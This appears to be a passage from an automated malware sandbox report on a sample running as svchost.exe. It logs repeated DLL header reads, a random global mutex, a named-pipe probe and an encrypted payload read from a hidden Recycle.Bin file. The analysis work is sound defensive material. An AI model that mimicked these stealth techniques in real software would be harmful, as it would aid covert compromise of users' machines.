File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081493491
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081493910
System info queried Type: ProcessorInformation success or wait 2081495048
System info queried Type: ProcessorInformation success or wait 2081498072
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081498490
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081499351
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081499620
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081500020
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081500286
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081500601
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081501257
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081501524
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081502060
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081502401
System info queried Type: ProcessorInformation success or wait 2081503528
System info queried Type: ProcessorInformation success or wait 2081506957
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081507377
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081508242
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081508510
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081508908
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081509173
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081509488
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081510099
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081510365
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081510899
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081511340
System info queried Type: ProcessorInformation success or wait 2081512438
System info queried Type: ProcessorInformation success or wait 2081515379
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081515794
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081516653
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081516923
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081517321
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081517586
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081517901
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081518513
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081518778
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081519312
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081519654
System info queried Type: ProcessorInformation success or wait 2081520780
System info queried Type: ProcessorInformation success or wait 2081523774
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081524188
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081525043
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081525312
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081525709
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081525976
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081526292
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081526906
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081527172
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081527708
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081528051
System info queried Type: ProcessorInformation success or wait 2081529179
System info queried Type: ProcessorInformation success or wait 2081532237
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081532656
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081533591
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081533860
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081534261
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081534526
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081534841
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081535452
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081535718
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081536252
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081536594
System info queried Type: ProcessorInformation success or wait 2081537718
System info queried Type: ProcessorInformation success or wait 2081540657
File opened Path: C:\WINDOWS\system32\WININET.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081541072
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081541927
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 4 Value: F8 00 00 00 success or wait 2081542198
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081542642
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 20 Value: 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 2081542909
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 224 Value: 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 2081543226
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081543838
File read Path: C:\WINDOWS\system32\wininet.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 2081544103
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\wininet.dll success or wait 2081544638
Section loaded Path: C:\WINDOWS\system32\wininet.dll Access: query and read Type: commit Baseaddress: E30000 Size: 65536 Protection: readonly Mapped to pid: own pid success or wait 2081544980
System info queried Type: ProcessorInformation success or wait 2081546104
System info queried Type: ProcessorInformation success or wait 2081549209
File opened Path: c:\windows\system32\WS2_32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081549619
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2081550486
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2081550755
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2081551379
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 20 Value: 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081551646
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 22 01 00 00 1C 00 00 00 00 00 00 73 12 00 00 00 10 00 00 00 20 01 00 00 00 AB 71 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 70 01 00 00 04 00 00 20 F0 01 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 04 14 00 00 success or wait 2081551962
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2081552572
File read Path: C:\WINDOWS\system32\ws2_32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 53 21 01 00 00 10 00 00 00 22 01 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 14 09 00 00 00 40 01 00 00 0A 00 00 00 26 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 F8 03 00 00 00 50 01 00 00 04 00 00 success or wait 2081552886
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\ws2_32.dll success or wait 2081553422
Section loaded Path: C:\WINDOWS\system32\ws2_32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 20480 Protection: readonly Mapped to pid: own pid success or wait 2081553764
System info queried Type: ProcessorInformation success or wait 2081554885
System info queried Type: ProcessorInformation success or wait 2081557157
File opened Path: C:\WINDOWS\system32\ADVAPI32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081557569
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2081558430
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2081558700
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2081559321
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 20 Value: 4C 01 04 00 48 1D 90 49 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081559587
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 46 07 00 00 3E 02 00 00 00 00 00 0B 71 00 00 00 10 00 00 00 20 07 00 00 00 DD 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 B0 09 00 00 04 00 00 B8 5B 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 A4 16 00 00 success or wait 2081559903
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2081560514
File read Path: C:\WINDOWS\system32\advapi32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C9 45 07 00 00 10 00 00 00 46 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 28 46 00 00 00 60 07 00 00 2C 00 00 00 4A 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 80 A9 01 00 00 B0 07 00 00 AA 01 00 success or wait 2081560780
File other operation Disposition: PositionInformation Data : Offset: 60 Path: C:\WINDOWS\system32\advapi32.dll success or wait 2081561315
Section loaded Path: C:\WINDOWS\system32\advapi32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 28672 Protection: readonly Mapped to pid: own pid success or wait 2081564806
System info queried Type: ProcessorInformation success or wait 2081566240
System info queried Type: ProcessorInformation success or wait 2081569209
File opened Path: C:\WINDOWS\system32\CRYPT32.dll Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file and random access Attributes: none Content Overwritten: false success or wait 2081569627
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 4 Value: F0 00 00 00 success or wait 2081570766
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 20 Value: 4C 01 04 00 D7 A0 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 2081571731
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 224 Value: 0B 01 07 0A 00 44 08 00 00 DC 00 00 00 00 00 00 32 16 00 00 00 10 00 00 00 20 08 00 00 00 A8 77 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 50 09 00 00 04 00 00 30 C5 09 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 9C 1A 00 00 success or wait 2081572051
File read Path: C:\WINDOWS\system32\crypt32.dll Offset: none Length: 160 Value: 2E 74 65 78 74 00 00 00 C4 43 08 00 00 10 00 00 00 44 08 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 E8 23 00 00 00 60 08 00 00 24 00 00 00 48 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 50 67 00 00 00 90 08 00 00 68 00 00 success or wait 2081572931
Section loaded Path: C:\WINDOWS\system32\crypt32.dll Access: query and read Type: commit Baseaddress: E30000 Size: 77824 Protection: readonly Mapped to pid: own pid success or wait 2081573811
System info queried Type: ProcessorInformation success or wait 2081574938
Mutant created Name: \BaseNamedObjects\Global\25LSmN0q5Cx8k1GCFvMKe5z0i3US0DM object name exists 2081577109
Thread created PID: 968 TID: 424 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2081578655
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2081596196
Thread delayed Time: 0 TID: 914 success or wait 2082457096
Thread delayed Time: 0 TID: 914 success or wait 2082457615
Thread delayed Time: 0 TID: 914 success or wait 2082458108
Thread delayed Time: 0 TID: 914 success or wait 2083575645
Thread delayed Time: 0 TID: 914 success or wait 2083576159
Thread delayed Time: 0 TID: 914 success or wait 2083576649
Thread delayed Time: 0 TID: 914 success or wait 2084694103
Thread delayed Time: 0 TID: 914 success or wait 2084694622
Thread delayed Time: 0 TID: 914 success or wait 2084695115
Thread delayed Time: 0 TID: 914 success or wait 2085812582
Thread delayed Time: 0 TID: 914 success or wait 2085813115
Thread delayed Time: 0 TID: 914 success or wait 2085813612
Thread delayed Time: 0 TID: 914 success or wait 2086931524
Thread delayed Time: 0 TID: 914 success or wait 2086932050
Thread delayed Time: 0 TID: 914 success or wait 2086932555
Thread delayed Time: 0 TID: 914 success or wait 2088050118
Thread delayed Time: 0 TID: 914 success or wait 2088050644
Thread delayed Time: 0 TID: 914 success or wait 2088051149
Thread delayed Time: 0 TID: 914 success or wait 2089168754
Thread delayed Time: 0 TID: 914 success or wait 2089169280
Thread delayed Time: 0 TID: 914 success or wait 2089169779
Thread delayed Time: 0 TID: 914 success or wait 2090287331
Thread delayed Time: 0 TID: 914 success or wait 2090287844
Thread delayed Time: 0 TID: 914 success or wait 2090288345
Thread delayed Time: 0 TID: 914 success or wait 2091405939
Thread delayed Time: 0 TID: 914 success or wait 2091406463
Thread delayed Time: 0 TID: 914 success or wait 2091406967
Thread delayed Time: 0 TID: 914 success or wait 2092527284
Thread delayed Time: 0 TID: 914 success or wait 2092527816
Thread delayed Time: 0 TID: 914 success or wait 2092528309
Thread delayed Time: 0 TID: 914 success or wait 2093643245
Thread delayed Time: 0 TID: 914 success or wait 2093643770
Thread delayed Time: 0 TID: 914 success or wait 2093644272
Thread delayed Time: 0 TID: 914 success or wait 2094764655
Thread delayed Time: 0 TID: 914 success or wait 2094765181
Thread delayed Time: 0 TID: 914 success or wait 2094765684
Thread delayed Time: 0 TID: 914 success or wait 2095883198
Thread delayed Time: 0 TID: 914 success or wait 2095883725
Thread delayed Time: 0 TID: 914 success or wait 2095884228
Thread delayed Time: 0 TID: 914 success or wait 2096998616
Thread delayed Time: 0 TID: 914 success or wait 2096999132
Thread delayed Time: 0 TID: 914 success or wait 2096999633
Thread delayed Time: 0 TID: 914 success or wait 2098117230
Thread delayed Time: 0 TID: 914 success or wait 2098117744
Thread delayed Time: 0 TID: 914 success or wait 2098118246
Thread delayed Time: 0 TID: 914 success or wait 2099236211
Thread delayed Time: 0 TID: 914 success or wait 2099236735
Thread created PID: 968 TID: 2648 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2189173971
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2189185240
Thread created PID: 968 TID: 3176 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2296393565
Thread created PID: 968 TID: 3216 EIP: 7C8106F9 Imagepath: C:\WINDOWS\system32\svchost.exe Injected: false success or wait 2297521482
File opened Path: \pipe\globpluginspipe Access: read attributes and synchronize and generic read Options: synchronous io non alert and non directory file Attributes: none Content Overwritten: false object name not found 2297527947
Analysis File: svchost.exe PID: 1052 Parent PID: 1636
+ Sections
+ General
Start time: 05:48:07
Start date: 01/12/2011
Path: C:\WINDOWS\system32\svchost.exe
Commandline: C:\WINDOWS\System32\svchost.exe -k netsvcs
Imagebase: 0x1000000
File size: 14336 bytes
MD5 hash: 27C6D03BCDB8CFEB96B716F3D8BE3E18
File Activities:
+ File opened
File Path Access Options Content overwritten Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 5 BAD6A36
C:\Recycle.Bin\07A49F015E0D693 read attributes and synchronize and generic read synchronous io non alert and non directory file false success or wait 2 BAF4E4E
C:\WINDOWS\system32\USER32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\WININET.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 11 BAD6A36
c:\windows\system32\WS2_32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
C:\WINDOWS\system32\ADVAPI32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
c:\windows\system32\CRYPT32.dll read attributes and synchronize and generic read synchronous io non alert and non directory file and random access false success or wait 1 BAD6A36
\pipe\globpluginspipe read attributes and synchronize and generic read synchronous io non alert and non directory file false object name not found 4 BADD812
+ File read
File Path Offset Length Value Completion Count Source Address
C:\WINDOWS\system32\ntdll.dll none 4 D0 00 00 00 success or wait 5 BAD6699
C:\WINDOWS\system32\ntdll.dll none 20 4C 01 04 00 7D F2 00 4D 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 5 BAD66D5
C:\WINDOWS\system32\ntdll.dll none 224 0B 01 07 0A 00 D0 07 00 00 3C 03 00 00 00 00 00 F8 20 01 00 00 10 00 00 00 90 07 00 00 00 90 7C 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 0A 00 00 00 00 00 00 20 0B 00 00 04 00 00 30 FD 0A 00 03 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 34 00 00 success or wait 5 BAD6717
C:\WINDOWS\system32\ntdll.dll none 160 2E 74 65 78 74 00 00 00 DA CE 07 00 00 10 00 00 00 D0 07 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 20 4A 00 00 00 E0 07 00 00 32 00 00 00 D4 07 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 78 BE 02 00 00 30 08 00 00 C0 02 00 success or wait 5 BAD67A2
C:\Recycle.Bin\07A49F015E0D693 none 5934 50 D7 96 D6 A6 EA BF F3 B7 FB 7B 65 8A 85 C9 85 C9 85 C9 85 C9 85 D8 95 D9 95 D3 9F FC B0 5F 82 BC 6E 9B 4E 30 D8 75 A5 B6 46 1F 53 16 3C E9 D5 6F 23 7C CC 40 C7 5F 13 5B 25 68 B6 F4 00 4A FB D0 8B 29 AA 5C 07 EB F8 69 F9 3F A6 F2 9C 1F 0D EA 9E F6 D2 0B 00 8E C4 6C EF 48 BA B7 4B DA AD F9 82 10 28 success or wait 2 BAE818F
C:\WINDOWS\system32\user32.dll none 4 D8 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\user32.dll none 20 4C 01 04 00 1B A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
C:\WINDOWS\system32\user32.dll none 224 0B 01 07 0A 00 F4 05 00 00 E2 02 00 00 00 00 00 17 B2 00 00 00 10 00 00 00 B0 05 00 00 00 41 7E 00 10 00 00 00 02 00 00 05 00 01 00 05 00 01 00 04 00 00 00 00 00 00 00 00 10 09 00 00 04 00 00 76 FC 08 00 02 00 00 00 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 39 00 00 success or wait 1 BAD6717
C:\WINDOWS\system32\user32.dll none 160 2E 74 65 78 74 00 00 00 83 F2 05 00 00 10 00 00 00 F4 05 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 80 11 00 00 00 10 06 00 00 0C 00 00 00 F8 05 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 88 A0 02 00 00 30 06 00 00 A2 02 00 success or wait 1 BAD67A2
C:\WINDOWS\system32\wininet.dll none 4 F8 00 00 00 success or wait 11 BAD6699
C:\WINDOWS\system32\wininet.dll none 20 4C 01 04 00 D8 ED 0F 4D 00 00 00 00 00 00 00 00 E0 00 02 21 success or wait 11 BAD66D5
C:\WINDOWS\system32\wininet.dll none 224 0B 01 08 00 00 FA 0A 00 00 34 03 00 00 00 00 00 48 17 00 00 00 10 00 00 00 50 0C 00 00 00 93 3D 00 10 00 00 00 02 00 00 06 00 00 00 06 00 00 00 05 00 01 00 00 00 00 00 00 60 0E 00 00 04 00 00 8F D2 0E 00 02 00 40 01 00 00 04 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 F8 18 00 00 success or wait 11 BAD6717
C:\WINDOWS\system32\wininet.dll none 160 2E 74 65 78 74 00 00 00 B0 F9 0A 00 00 10 00 00 00 FA 0A 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2E 64 61 74 61 00 00 00 50 68 00 00 00 10 0B 00 00 34 00 00 00 FE 0A 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 C0 2E 72 73 72 63 00 00 00 C0 61 02 00 00 80 0B 00 00 62 02 00 success or wait 11 BAD67A2
C:\WINDOWS\system32\ws2_32.dll none 4 F0 00 00 00 success or wait 1 BAD6699
C:\WINDOWS\system32\ws2_32.dll none 20 4C 01 04 00 63 A1 02 48 00 00 00 00 00 00 00 00 E0 00 0E 21 success or wait 1 BAD66D5
